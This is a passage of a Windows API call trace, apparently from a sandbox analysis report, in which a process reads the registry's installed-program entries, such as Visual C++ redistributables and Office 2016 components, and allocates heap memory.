lpcbData=0xdeb88*=0x208) returned 0x2 [0146.737] RegOpenKeyExW (in: hKey=0x220, lpSubKey="{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}", ulOptions=0x0, samDesired=0x20219, phkResult=0xdef9c | out: phkResult=0xdef9c*=0x280) returned 0x0 [0146.737] RegQueryValueExW (in: hKey=0x280, lpValueName="SystemComponent", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x4, lpData=0xded98*=0x1, lpcbData=0xdeb88*=0x4) returned 0x0 [0146.737] RegOpenKeyExW (in: hKey=0x220, lpSubKey="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", ulOptions=0x0, samDesired=0x20219, phkResult=0xdef9c | out: phkResult=0xdef9c*=0x284) returned 0x0 [0146.737] RegQueryValueExW (in: hKey=0x284, lpValueName="SystemComponent", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x31, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.737] RegQueryValueExW (in: hKey=0x284, lpValueName="WindowsInstaller", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x31, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.737] RegQueryValueExW (in: hKey=0x284, lpValueName="ReleaseType", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.737] RegQueryValueExW (in: hKey=0x284, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x1, lpData="11.0.61030.0", lpcbData=0xdeb88*=0x1a) returned 0x0 [0146.737] RegQueryValueExW (in: hKey=0x284, lpValueName="DisplayName", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x1, lpData="Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030", lpcbData=0xdeb88*=0x7a) returned 0x0 [0146.737] RegQueryValueExW (in: hKey=0x284, lpValueName="InstallLocation", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x4d, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.737] RegQueryValueExW (in: hKey=0x284, lpValueName="DisplayIcon", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x1, lpData="C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe,0", lpcbData=0xdeb88*=0xae) returned 0x0 [0146.737] RegQueryValueExW (in: hKey=0x284, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0xdeb88, lpData=0xded94, lpcbData=0xdeb84*=0x208 | out: lpType=0xdeb88*=0x0, lpData=0xded94*=0xe0, lpcbData=0xdeb84*=0x208) returned 0x2 [0146.737] RegQueryValueExW (in: hKey=0x284, lpValueName="UninstallString", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x1, lpData="\"C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe\" /uninstall", lpcbData=0xdeb88*=0xc6) returned 0x0 [0146.737] RegOpenKeyExW (in: hKey=0x220, lpSubKey="{3c3aafc8-d898-43ec-998f-965ffdae065a}", ulOptions=0x0, samDesired=0x20219, phkResult=0xdef9c | out: phkResult=0xdef9c*=0x288) returned 0x0 [0146.738] RegQueryValueExW (in: hKey=0x288, lpValueName="SystemComponent", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.738] RegQueryValueExW (in: hKey=0x288, lpValueName="WindowsInstaller", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.738] RegQueryValueExW (in: hKey=0x288, lpValueName="ReleaseType", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.738] RegQueryValueExW (in: hKey=0x288, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x1, lpData="12.0.30501.0", lpcbData=0xdeb88*=0x1a) returned 0x0 [0146.738] RegQueryValueExW (in: hKey=0x288, lpValueName="DisplayName", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x1, lpData="Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501", lpcbData=0xdeb88*=0x7a) returned 0x0 [0146.738] RegQueryValueExW (in: hKey=0x288, lpValueName="InstallLocation", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x4d, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.738] RegQueryValueExW (in: hKey=0x288, lpValueName="DisplayIcon", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x1, lpData="C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe,0", lpcbData=0xdeb88*=0xae) returned 0x0 [0146.738] RegQueryValueExW (in: hKey=0x288, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0xdeb88, lpData=0xded94, lpcbData=0xdeb84*=0x208 | out: lpType=0xdeb88*=0x0, lpData=0xded94*=0xe0, lpcbData=0xdeb84*=0x208) returned 0x2 [0146.738] RegQueryValueExW (in: hKey=0x288, lpValueName="UninstallString", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x1, lpData="\"C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe\" /uninstall", lpcbData=0xdeb88*=0xc6) returned 0x0 [0146.739] RegOpenKeyExW (in: hKey=0x220, lpSubKey="{65e650ff-30be-469d-b63a-418d71ea1765}", ulOptions=0x0, samDesired=0x20219, phkResult=0xdef9c | out: phkResult=0xdef9c*=0x28c) returned 0x0 [0146.739] RegQueryValueExW (in: hKey=0x28c, lpValueName="SystemComponent", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.739] RegQueryValueExW (in: hKey=0x28c, lpValueName="WindowsInstaller", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.739] RegQueryValueExW (in: hKey=0x28c, lpValueName="ReleaseType", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.739] RegQueryValueExW (in: hKey=0x28c, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x1, lpData="14.25.28508.3", lpcbData=0xdeb88*=0x1c) returned 0x0 [0146.739] RegQueryValueExW (in: hKey=0x28c, lpValueName="DisplayName", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x1, lpData="Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508", lpcbData=0xdeb88*=0x86) returned 0x0 [0146.739] RegQueryValueExW (in: hKey=0x28c, lpValueName="InstallLocation", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x4d, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.739] RegQueryValueExW (in: hKey=0x28c, lpValueName="DisplayIcon", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x1, lpData="C:\\ProgramData\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}\\VC_redist.x86.exe,0", lpcbData=0xdeb88*=0xb0) returned 0x0 [0146.739] RegQueryValueExW (in: hKey=0x28c, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0xdeb88, lpData=0xded94, lpcbData=0xdeb84*=0x208 | out: lpType=0xdeb88*=0x0, lpData=0xded94*=0xe0, lpcbData=0xdeb84*=0x208) returned 0x2 [0146.739] RegQueryValueExW (in: hKey=0x28c, lpValueName="UninstallString", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x1, lpData="\"C:\\ProgramData\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}\\VC_redist.x86.exe\" /uninstall", lpcbData=0xdeb88*=0xc8) returned 0x0 [0146.739] RegOpenKeyExW (in: hKey=0x220, lpSubKey="{6913e92a-b64e-41c9-a5e6-cef39207fe89}", ulOptions=0x0, samDesired=0x20219, phkResult=0xdef9c | out: phkResult=0xdef9c*=0x290) returned 0x0 [0146.739] RegQueryValueExW (in: hKey=0x290, lpValueName="SystemComponent", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.740] RegQueryValueExW (in: hKey=0x290, lpValueName="WindowsInstaller", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.740] RegQueryValueExW (in: hKey=0x290, lpValueName="ReleaseType", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.740] RegQueryValueExW (in: hKey=0x290, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x1, lpData="14.25.28508.3", lpcbData=0xdeb88*=0x1c) returned 0x0 [0146.740] RegQueryValueExW (in: hKey=0x290, lpValueName="DisplayName", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x1, lpData="Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508", lpcbData=0xdeb88*=0x86) returned 0x0 [0146.740] RegQueryValueExW (in: hKey=0x290, lpValueName="InstallLocation", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x4d, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.740] RegQueryValueExW (in: hKey=0x290, lpValueName="DisplayIcon", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x1, lpData="C:\\ProgramData\\Package Cache\\{6913e92a-b64e-41c9-a5e6-cef39207fe89}\\VC_redist.x64.exe,0", lpcbData=0xdeb88*=0xb0) returned 0x0 [0146.740] RegQueryValueExW (in: hKey=0x290, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0xdeb88, lpData=0xded94, lpcbData=0xdeb84*=0x208 | out: lpType=0xdeb88*=0x0, lpData=0xded94*=0xe0, lpcbData=0xdeb84*=0x208) returned 0x2 [0146.740] RegQueryValueExW (in: hKey=0x290, lpValueName="UninstallString", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x1, lpData="\"C:\\ProgramData\\Package Cache\\{6913e92a-b64e-41c9-a5e6-cef39207fe89}\\VC_redist.x64.exe\" /uninstall", lpcbData=0xdeb88*=0xc8) returned 0x0 [0146.740] RegOpenKeyExW (in: hKey=0x220, lpSubKey="{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}", ulOptions=0x0, samDesired=0x20219, phkResult=0xdef9c | out: phkResult=0xdef9c*=0x294) returned 0x0 [0146.740] RegQueryValueExW (in: hKey=0x294, lpValueName="SystemComponent", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.740] RegQueryValueExW (in: hKey=0x294, lpValueName="WindowsInstaller", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x4, lpData=0xded98*=0x1, lpcbData=0xdeb88*=0x4) returned 0x0 [0146.740] RegQueryValueExW (in: hKey=0x294, lpValueName="WindowsInstaller", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x4, lpData=0xded98*=0x1, lpcbData=0xdeb88*=0x4) returned 0x0 [0146.740] RegOpenKeyExW (in: hKey=0x21c, lpSubKey="c1c4f01781cc94c4c8fb1542c0981a2a", ulOptions=0x0, samDesired=0x20019, phkResult=0xdef9c | out: phkResult=0xdef9c*=0x298) returned 0x0 [0146.741] RegQueryValueExW (in: hKey=0x298, lpValueName="ProductName", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x1, lpData="Microsoft Visual C++ 2005 Redistributable", lpcbData=0xdeb88*=0x54) returned 0x0 [0146.741] RegQueryValueExW (in: hKey=0x298, lpValueName="ProductIcon", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x4d, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.741] RegCloseKey (hKey=0x298) returned 0x0 [0146.741] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0ed0 [0146.741] RegQueryValueExW (in: hKey=0x294, lpValueName="DisplayName", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x1, lpData="Microsoft Visual C++ 2005 Redistributable", lpcbData=0xdeb88*=0x54) returned 0x0 [0146.741] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x60) returned 0x47a3048 [0146.741] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x60) returned 0x47a30b0 [0146.741] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0cf0 [0146.741] RegQueryValueExW (in: hKey=0x294, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x1, lpData="8.0.61001", lpcbData=0xdeb88*=0x14) returned 0x0 [0146.741] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0e58 [0146.741] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0ed0 [0146.741] RegQueryValueExW (in: hKey=0x294, lpValueName="InstallLocation", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x1, lpData="", lpcbData=0xdeb88*=0x2) returned 0x0 [0146.741] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0b10 [0146.741] RegQueryValueExW (in: hKey=0x294, lpValueName="DisplayIcon", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.741] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0d90 [0146.741] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x60) returned 0x47a4e60 [0146.742] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x60) returned 0x47a4ec8 [0146.742] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0c50 [0146.742] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x60) returned 0x47a4e60 [0146.742] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0e80 [0146.742] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x60) returned 0x47a4f30 [0146.742] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0c78 [0146.742] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x47a1d68 [0146.742] RegOpenKeyExW (in: hKey=0x220, lpSubKey="{90160000-0011-0000-0000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20219, phkResult=0xdef9c | out: phkResult=0xdef9c*=0x298) returned 0x0 [0146.742] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x8) returned 0x47a1780 [0146.742] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0c50 [0146.742] RegQueryValueExW (in: hKey=0x298, lpValueName="SystemComponent", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x4, lpData=0xded98*=0x1, lpcbData=0xdeb88*=0x4) returned 0x0 [0146.742] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x47a1f20 [0146.742] RegOpenKeyExW (in: hKey=0x220, lpSubKey="{90160000-0015-0409-0000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20219, phkResult=0xdef9c | out: phkResult=0xdef9c*=0x29c) returned 0x0 [0146.742] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x8) returned 0x47a1860 [0146.742] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0cf0 [0146.742] RegQueryValueExW (in: hKey=0x29c, lpValueName="SystemComponent", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x4, lpData=0xded98*=0x1, lpcbData=0xdeb88*=0x4) returned 0x0 [0146.742] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x47a1c08 [0146.742] RegOpenKeyExW (in: hKey=0x220, lpSubKey="{90160000-0016-0409-0000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20219, phkResult=0xdef9c | out: phkResult=0xdef9c*=0x2a0) returned 0x0 [0146.742] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x8) returned 0x47a1870 [0146.742] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0d40 [0146.743] RegQueryValueExW (in: hKey=0x2a0, lpValueName="SystemComponent", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x4, lpData=0xded98*=0x1, lpcbData=0xdeb88*=0x4) returned 0x0 [0146.743] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x47a1dc0 [0146.743] RegOpenKeyExW (in: hKey=0x220, lpSubKey="{90160000-0018-0409-0000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20219, phkResult=0xdef9c | out: phkResult=0xdef9c*=0x2a4) returned 0x0 [0146.743] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x8) returned 0x47a17a0 [0146.743] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0b10 [0146.743] RegQueryValueExW (in: hKey=0x2a4, lpValueName="SystemComponent", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x4, lpData=0xded98*=0x1, lpcbData=0xdeb88*=0x4) returned 0x0 [0146.743] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x47a1d68 [0146.743] RegOpenKeyExW (in: hKey=0x220, lpSubKey="{90160000-0019-0409-0000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20219, phkResult=0xdef9c | out: phkResult=0xdef9c*=0x2a8) returned 0x0 [0146.743] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x8) returned 0x47a17c0 [0146.743] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a09f8 [0146.743] RegQueryValueExW (in: hKey=0x2a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x4, lpData=0xded98*=0x1, lpcbData=0xdeb88*=0x4) returned 0x0 [0146.743] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x47a1f20 [0146.743] RegOpenKeyExW (in: hKey=0x220, lpSubKey="{90160000-001A-0409-0000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20219, phkResult=0xdef9c | out: phkResult=0xdef9c*=0x2ac) returned 0x0 [0146.743] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x8) returned 0x47a1800 [0146.743] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0cf0 [0146.743] RegQueryValueExW (in: hKey=0x2ac, lpValueName="SystemComponent", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x4, lpData=0xded98*=0x1, lpcbData=0xdeb88*=0x4) returned 0x0 [0146.743] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x47a2188 [0146.744] RegOpenKeyExW (in: hKey=0x220, lpSubKey="{90160000-001B-0409-0000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20219, phkResult=0xdef9c | out: phkResult=0xdef9c*=0x2b0) returned 0x0 [0146.744] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x8) returned 0x47a1750 [0146.744] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0a70 [0146.744] RegQueryValueExW (in: hKey=0x2b0, lpValueName="SystemComponent", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x4, lpData=0xded98*=0x1, lpcbData=0xdeb88*=0x4) returned 0x0 [0146.744] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x47a2398 [0146.744] RegOpenKeyExW (in: hKey=0x220, lpSubKey="{90160000-001F-0409-0000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20219, phkResult=0xdef9c | out: phkResult=0xdef9c*=0x2b4) returned 0x0 [0146.744] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x8) returned 0x47a17d0 [0146.744] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0d90 [0146.744] RegQueryValueExW (in: hKey=0x2b4, lpValueName="SystemComponent", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x4, lpData=0xded98*=0x1, lpcbData=0xdeb88*=0x4) returned 0x0 [0146.744] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x47a1f20 [0146.744] RegOpenKeyExW (in: hKey=0x220, lpSubKey="{90160000-001F-040C-0000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20219, phkResult=0xdef9c | out: phkResult=0xdef9c*=0x2b8) returned 0x0 [0146.744] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x8) returned 0x47a1840 [0146.744] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0d90 [0146.744] RegQueryValueExW (in: hKey=0x2b8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x4, lpData=0xded98*=0x1, lpcbData=0xdeb88*=0x4) returned 0x0 [0146.744] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x47a2188 [0146.744] RegOpenKeyExW (in: hKey=0x220, lpSubKey="{90160000-001F-0C0A-0000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20219, phkResult=0xdef9c | out: phkResult=0xdef9c*=0x2bc) returned 0x0 [0146.745] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x8) returned 0x47a1850 [0146.746] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0b38 [0146.746] RegQueryValueExW (in: hKey=0x2bc, lpValueName="SystemComponent", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x4, lpData=0xded98*=0x1, lpcbData=0xdeb88*=0x4) returned 0x0 [0146.746] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x47a2238 [0146.746] RegOpenKeyExW (in: hKey=0x220, lpSubKey="{90160000-002C-0409-0000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20219, phkResult=0xdef9c | out: phkResult=0xdef9c*=0x2c0) returned 0x0 [0146.746] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x8) returned 0x47a1880 [0146.746] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0db8 [0146.746] RegQueryValueExW (in: hKey=0x2c0, lpValueName="SystemComponent", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x4, lpData=0xded98*=0x1, lpcbData=0xdeb88*=0x4) returned 0x0 [0146.746] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x47a22e8 [0146.746] RegOpenKeyExW (in: hKey=0x220, lpSubKey="{90160000-0044-0409-0000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20219, phkResult=0xdef9c | out: phkResult=0xdef9c*=0x2c4) returned 0x0 [0146.746] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x8) returned 0x47a1760 [0146.746] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0e30 [0146.746] RegQueryValueExW (in: hKey=0x2c4, lpValueName="SystemComponent", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x4, lpData=0xded98*=0x1, lpcbData=0xdeb88*=0x4) returned 0x0 [0146.746] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x47a2448 [0146.746] RegOpenKeyExW (in: hKey=0x220, lpSubKey="{90160000-006E-0409-0000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20219, phkResult=0xdef9c | out: phkResult=0xdef9c*=0x2c8) returned 0x0 [0146.747] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x8) returned 0x47a1740 [0146.747] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0a98 [0146.747] RegQueryValueExW (in: hKey=0x2c8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x4, lpData=0xded98*=0x1, lpcbData=0xdeb88*=0x4) returned 0x0 [0146.747] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x47a2550 [0146.747] RegOpenKeyExW (in: hKey=0x220, lpSubKey="{90160000-008C-0000-0000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20219, phkResult=0xdef9c | out: phkResult=0xdef9c*=0x2cc) returned 0x0 [0146.747] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x8) returned 0x47a1700 [0146.747] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) 